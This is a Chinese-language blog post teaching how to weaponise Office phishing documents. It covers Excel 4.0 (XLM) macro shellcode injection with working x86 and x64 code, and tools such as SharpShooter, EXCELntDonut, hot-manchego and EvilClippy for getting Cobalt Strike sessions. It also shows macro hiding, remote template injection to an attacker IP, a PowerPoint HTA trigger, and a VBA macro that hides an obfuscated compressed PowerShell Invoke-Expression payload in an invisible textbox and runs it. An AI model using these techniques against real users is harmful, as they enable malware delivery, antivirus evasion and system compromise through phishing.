再聊钓鱼文档

  • A+

之前写过类似的钓鱼文档的文章,今天再来水一篇,希望能对大家有所帮助。

一、XLM Macro(Excel 4.0)

与一般的office文档不同的是,其格式为XLM,不同于其他的XML,XLM被创建于1992年,比VBA还要早出很多。

clipboard.png

下面我们看一个简单的demo:

clipboard 1.png

这项技术在2018年,在这个文章中被指出:https://outflank.nl/blog/2018/10/06/old-school-evil-excel-4-0-macros-xlm/

由此也衍生出了很多的相关项目,比如(Excel4-DCOM:https://github.com/outflanknl/Excel4-DCOM):

language
Invoke-Excel4DCOM -ComputerName server01 -Payload C:\temp\payload.bin

其也是依靠XLM的来调用win32API来实现远程线程注入:

clipboard 2.png

SharpShooter:https://github.com/mdsecactivebreach/SharpShooter 利用该工具创建XLS Macro的方法如下:

language
SharpShooter.py --payload slk --output foo --rawscfile ~./x86payload.bin --smuggle --template mcafee

生成的SLK文件如下:

clipboard 3.png

原理基本类似。不过这种都是基于X86的,X64有一些问题,有一篇文章(https://www.cybereason.com/blog/excel4.0-macros-now-with-twice-the-bits)介绍了该问题。

clipboard 4.png

最后衍生的工具:https://gist.github.com/Philts/f7c85995c5198e845c70cc51cd4e7e2a

也就是在x64中使用QueueUserAPC来进行注入。

当然还有很多相关的工具(Macrome:https://github.com/michaelweber/Macrome、EXCELntDonut:https://github.com/FortyNorthSecurity/EXCELntDonut)等等。

进程注入

在XLS中支持win32的调用,也就意味着我们可以进行进程注入等操作。调用方式如下:

language
REGISTER(module_name, procedure_name, type, alias, argument, macro_type, category)

clipboard 5.png

需要注意的是,区分x86与x64,x86的demo如下:

```vba

=REGISTER("Kernel32","VirtualAlloc","JJJJJ","Valloc",,1,9)
=REGISTER("Kernel32","WriteProcessMemory","JJJCJJ","WProcessMemory",,1,9)
=REGISTER("Kernel32","CreateThread","JJJJJJJ","CThread",,1,9)
=Valloc(0,65536,4096,64)
=SELECT(B1:B999,B1)
=SET.VALUE(D1,0)
=WHILE(ACTIVE.CELL()<>"excel")
=SET.VALUE(D2,LEN(ACTIVE.CELL()))
=WProcessMemory(-1,A10+(D1*255),ACTIVE.CELL(),LEN(ACTIVE.CELL()),0)
=SET.VALUE(D1,D1+1)
=SELECT(,"R[1]C")
=NEXT()
=CThread(0,0,A10,0,0,0)
=HALT()
```
x64demo如下:

vba
=REGISTER("Kernel32","VirtualAlloc","JJJJJ","Valloc",,1,9)
=REGISTER("Kernel32","RtlCopyMemory","JJCJ","RTL",,1,9)
=REGISTER("Kernel32","QueueUserAPC","JJJJ","Queue",,1,9)
=REGISTER("ntdll","NtTestAlert","J","Go",,1,9)
=WHILE(A22=0)
=SET.VALUE(A22,Valloc(A21,65536,12288,64))
=SET.VALUE(A21,A21+262144)
=NEXT()
=REGISTER("Kernel32","RtlCopyMemory","JJCJ","RTL",,1,9)
=REGISTER("Kernel32","QueueUserAPC","JJJJ","Queue",,1,9)
=REGISTER("ntdll","NtTestAlert","J","Go",,1,9)
=SELECT(C1:C3479,C1)
=SET.VALUE(D1,0)
=WHILE(ACTIVE.CELL()<>"EXCEL")
=SET.VALUE(D2,LEN(ACTIVE.CELL()))
=RTL(A22+(D1*10),ACTIVE.CELL(),LEN(ACTIVE.CELL()))
=SET.VALUE(D1,D1+1)
=SELECT(,"R[1]C")
=NEXT()
=Queue(A22,-2,0)
=Go()
=SET.VALUE(A22,0)
=HALT()

这里方便起见直接使用EXCELntDonut来生成。使用Cs生成shellcode,然后替换到指定位置:

clipboard 6.png

然后运行:

language
EXCELntDonut -f exe_source.cs -r System.Windows.Forms.dll

clipboard 7.png

然后将数据插入,并处理

clipboard 8.png

clipboard 9.png

然后执行即可。可惜测试时一直失败。

clipboard 10.png

Evasion

效果相等:

clipboard 11.png

宏隐藏(https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/b9ec509a-235d-424e-871d-f8e721106501):

clipboard 12.png

即改成02

clipboard 13.png

此时已无法显示隐藏:

clipboard 14.png

EPPLUS:EPPlus 5-Excel spreadsheets for .NET

EPPLUS是一个用来生成Excel的.net库。https://github.com/EPPlusSoftware/EPPlus

利用该程序可以更改的免杀excel,demo:https://github.com/FortyNorthSecurity/hot-manchego

用法:

language
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:EPPlus.dll hot-manchego.cs
hot-manchego.exe blank.xlsm vba.txt

执行宏,获取Cs会话。

clipboard 15.png

二、powerpoint

这种攻击则利用的是鼠标轨迹来进行操作,比如鼠标点击、鼠标移动等。操作如下:

clipboard 16.png

插入Cs生成的hta文件。点击时,

clipboard 17.png

Cs上线。

三,远程加载文档

每一个文档都是一个zip文件,解压,编辑

clipboard 18.png

修改为:

language
<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://192.168.1.106/1.dotm" TargetMode="External"/>

clipboard 19.png

此时打开文档,运行宏即可上线。

四,控件

```vba
Sub Main()
On Error Resume Next
createTextBoxs
ExecuteTextBoxCommands
End Sub

Sub createTextBoxs()
On Error Resume Next
Dim objTextBox As Shape
Dim secretkey As Long
Dim str As String
Dim zHf As String
Dim payload As String

payload = "H4sIAAAAAAAAAK1WaW/iShb9nPwKf4gEKCQBs4U3ivQAYzDGxmA2kxdFZbuAMuWtvGDzpv/7lA2k09PpmZZmkJCr7LucOnepq8Lw"
payload = payload + "QQ0JMkLJNSHzsIQkQK7DsLe328gxwmydLd53MHz3iGu8A9MkMAiYv29vFECAzRTvYkDebdeMMCwz+SYThGZEYOnm5vYmfxU5AdjC"
payload = payload + "dweEKIbvNgz3rhkwL0zxteN5nGsD5Lz98UcvIgQ64Xn/OIBhJwigrWMEg2KJ+Sez2kMCHya6BY2Q+Zu5e38cYFcH+CKW9oCxp6fo"
payload = payload + "OGb2bewaIDvBo+phFBYLf/1VKL0+VN8e+34EcFAsqGkQQvvRxLhQYr6VMofz1IPFgoQM4gbuNnxcIafGPi5y9HIOXjpjL5QuJ9t5"
payload = payload + "gJ7j14fMrJ51igW6VCg3nTOHhTLzmvl7fXtj/vxAM4ucENnwUXBCSFxPhSRGBgweh8AxMZzBLVUrBDRmzq5QoiAIDCPiMFcsVC92"
payload = payload + "D7B450QYl6nd19+1+1aU4fFK7u8qFT8rUSklJKXyJSd+hw4pz5uzOXqcn9B/Sq4S/f2UYKXbb1+lqgkx3IEQvoeU30+5entz85ov"
payload = payload + "IT1PUXEDlOu9MJUyI1EQIHRJmoVzTiJYevsen7Pbq2ZQ/qWh6lXronMOzxnHC/O6dJH5dntTur1kT/b+XY8QNiHJvv+6Gji4RQ7k"
payload = payload + "UgfYyLgmfPGrmMEthjkfj1cxmeIsFi4foMld2ClkhL7+rNa3Ufih2z2D6xg07gFFRVOi9COYcwyLBcGRoE35O+9pmt5taZnBq/Sl"
payload = payload + "tNKr92yf5XIPgyAoM0pE69woMyoEGJplpuME6PKpE4Vuvix8hytFOEQGCMKrubfSF5ReXPdch1ZMZNDoUhrmqgcNBHDGSpkZIhN2"
payload = payload + "UxXtrhAKX3LSAxjTkqOWYhoT+ibjQg2znCFm+d/zo/SowlCwPQxtKp13IR6DHe05l4rK0w3soFn4D7CvdXIuioyrK0mfQNMEULEb"
payload = payload + "lpklIiHta4XyT4n3v8H7scX8ALNH4CWQxbwQhS1t6OcuQNkJ0Ik2Y+gzz6WsBF+7aZjVUm7GyK6blw+ic1pJSJV44tpdEMBmXc17"
payload = payload + "XLFQY6Nd0lbGzVSyBHaUao6cGM6S9GN+AJr7ZMpGrjEPiT/sc3Q/M9ggwAPs6fuxD5KxZSXt3jrtKx12jJqogYRo3D05PDJsqjed"
payload = payload + "uNqsTYRY5l0ctMQev1oAZPm5r8iuV80+SMcno7knExa62lH2hVjpmKvYaNqiyzdDqruM+pFH+tFE0aKxP7YFVN/H3DIcxcLgeSiy"
payload = payload + "GnjGegvm+qaf+dL8XQyy/amd7ZHfgyTzo1H2Ya3ahKtRS3M8BFfR7nSUkWGeOMiO6PvIlQwvqMknY3s4WMCrLtRDVZwvNmvKTRX4"
payload = payload + "hNebRNU8HC87i0NN2ZAcW8xTjHKGExns6KR5h4259Ps1RRcWQ0z8aITsp2kqpBcZe5Sqapc+xY0p+s8N88SmQ68OmgRRThPqp5Xx"
payload = payload + "aywCS1hNHGPNI9vYs9zMMtp25Dco7vpQHonrhPjhiPgx9hsTxchw53qZ/LSOJ1Uq7+vWWAT3ApIs0D4FYxHG2TpVODFJBUt4jrqZ"
payload = payload + "HjdIsL48WF61Dpsjh8XTNteWoCfaUjxTm7Mu6K6T+27aHyxUMx0kHW4trp86+nbnBq2DI3X1eijMOi2LsLzJpz01RYcnvD7E7Hij"
payload = payload + "zPGgsmhMogrkYCqzi/5mxtmj/uxQXQ+mcjTnsTivtHtcV5P7R2k87SeTRWW0Vg+8MtvvON3p+pudBLiZpHVqMxoPU1ryHU5fGxw/"
payload = payload + "raiDjlxbLLxhZu9sw41EVe6tZ5u+IE3WvV2j20Lb0xPeWa1D41CVN+0F2R21mWDp3hYE7BE1gHrfirzOXN427bm7ZTdNQYOVJQSg"
payload = payload + "eqqAlup3dhOzJ676+/V4IdaaRnP69BwYadVSWEGdP8faUF7K4ux5GRw30ugETZ+7r7DcWtr5glLbhEHYqlYPykwTLHmkVO6TrZxU"
payload = payload + "HWEyu190h9I8iWuidtQAqVQr3LY+8AbcsO1BzK0XVb/fdNd7rr6vI3u8DFvjCm0fdrNXc+yFtnna1FyV666D8XxUG+0loOimtrfm"
payload = payload + "aNDg96fB0FdOvUa9Fh/1+kpqrCSho1U7w+kgGdvyuj4YidOBYGlebY5dvnrOaX9Dc5XWqKgLp6xWRaDlNStuYN08JuGJBa3u0RhE"
payload = payload + "fkL/FZqT9ysqe8xkfJ+leS3pK/9I8xo0OafT1K1lY8n7vRkRoh6te70Ca2ELpJolULvGPTeO5ZZR6wqgT+PJzwK5v6uo/WRhGcg3"
payload = payload + "5ruXl7xVbl1Cp58kmyj+wdDnAw6Zj4ZH2xxtr9n7+/u8Jd58fHq9S96uY+TH/kFPqLla4/bm23VeiMGnrvmr6UwCJNgDTLspnbCu"
payload = payload + "9yPvEv4yJykuyjSKxa9H+wMkDsR07KWD8fVW6WDsGtlk94sR68+Pvk9vzwVd1tgvV6XvF0SpdL369Gi7zcefyxGvU+D3q2RDz1f+"
payload = payload + "ROQYOrtwX2YqSa1SqWTPeoVa+31ieq6XFj/slbP57xOUz65w7upjYCORY8P/Ywx+8Prf2c34y2fI7+zliL6mLLuU/wU5qB694w0A"
payload = payload + "AA=="

zHf = " -NoP -NonI -Command ""Invoke-"
zHf = zHf + "Expression $(New-Object IO.StreamReader ($(New-O"
zHf = zHf + "bject IO.Compression.DeflateStream ($(New-Object"
zHf = zHf + " IO.MemoryStream (,$([Convert]::FromBase64String"
zHf = zHf + "(\"" " & payload & " \"" )))), [IO.Compression.Compr"
zHf = zHf + "essionMode]::Decompress)), [Text.Encoding]::ASCI"
zHf = zHf + "I)).ReadToEnd();Read-Host;"""

secretkey = RGB(1, 33, 7)
Debug.Print "Adding Embedded Command Shape Into Document"
Set objTextBox = ActiveDocument.Shapes.AddTextbox(msoTextOrientationHorizontal, 0, 0, 0, 0)
With objTextBox
.TextFrame.TextRange.Text = "powershell.exe|" + zHf + "|open|1"
.Name = "Shell.Application"
.Height = 1
.Width = 1
.Visible = msoFalse
.Shadow.Visible = True
.Shadow.ForeColor.RGB = secretkey
If .Shadow.ForeColor.RGB <> secretkey Then
Debug.Print "Fail to set secret key"
End If
Debug.Print "Secret Key For Command Shape: " & CStr(.Shadow.ForeColor.RGB)
.AlternativeText = "ShellExecute"
.TextFrame.TextRange.Font.TextColor.RGB = ActiveDocument.Background.Fill.BackColor
End With
End Sub

Sub ExecuteTextBoxCommands()
On Error Resume Next
Dim objCmdShape As Shape
Dim secretkey As Long
Dim cmdParams() As String
Dim cmdCommand As String
Dim cmdType As String
Dim cmdObj As Object
secretkey = RGB(1, 33, 7)
For x = 1 To ActiveDocument.Shapes.Count
Set objCmdShape = ActiveDocument.Shapes(x)
If objCmdShape.Shadow.ForeColor.RGB = secretkey Then
Debug.Print "Discovered Command Text Object"
cmdType = objCmdShape.Name
cmdCommand = objCmdShape.AlternativeText
cmdParams = Split(objCmdShape.TextFrame.TextRange.Text, "|")
Debug.Print "Command Type To Execute: " & cmdType
Debug.Print "Command To Execute: " & cmdCommand
Debug.Print "Command Params to Execute: " & Join(cmdParams, " & ")
Set cmdObj = Interaction.CreateObject(cmdType)
VBA$.[Interaction].CallByName! cmdObj, [cmdCommand], VbMethod, cmdParams(0), cmdParams(1), cmdParams(2)
objCmdShape.Delete
ActiveDocument.Save
Exit For
End If
Next
End Sub
```

这中攻击手法,没有太神奇的地方,主要就是利用宏去创建一个不可见的控件,然后调用去执行恶意代码。上面给出的代码不可直接使用,需要更改里面的powershell部分,就留给各位读者自行补全了。

五,VBA Stomping

直译过来就是VBA重踏。怎么去理解这个东西呢,比如说我们创建一个基础的VBA代码:

clipboard 20.png

当我们解压该文档,并将其使用0填充时,依旧可以去执行,就行下面这样:

clipboard 21.png

改为:

clipboard 22.png

此时仍然可以使用。

武器化:https://github.com/outflanknl/EvilClippy

编译命令:

language
csc /reference:OpenMcdf.dll,System.IO.Compression.FileSystem.dll /out:EvilClippy.exe *.cs

clipboard 23.png

使用方法:

language
EvilClippy.exe -s fakecode.vba -t 2016x86 macrofile.doc

这样你便可以得到一个处理好的文档。

总结

上面介绍了一些常见的钓鱼文档的操作,希望能给大家带来帮助,结合使用,效果更加。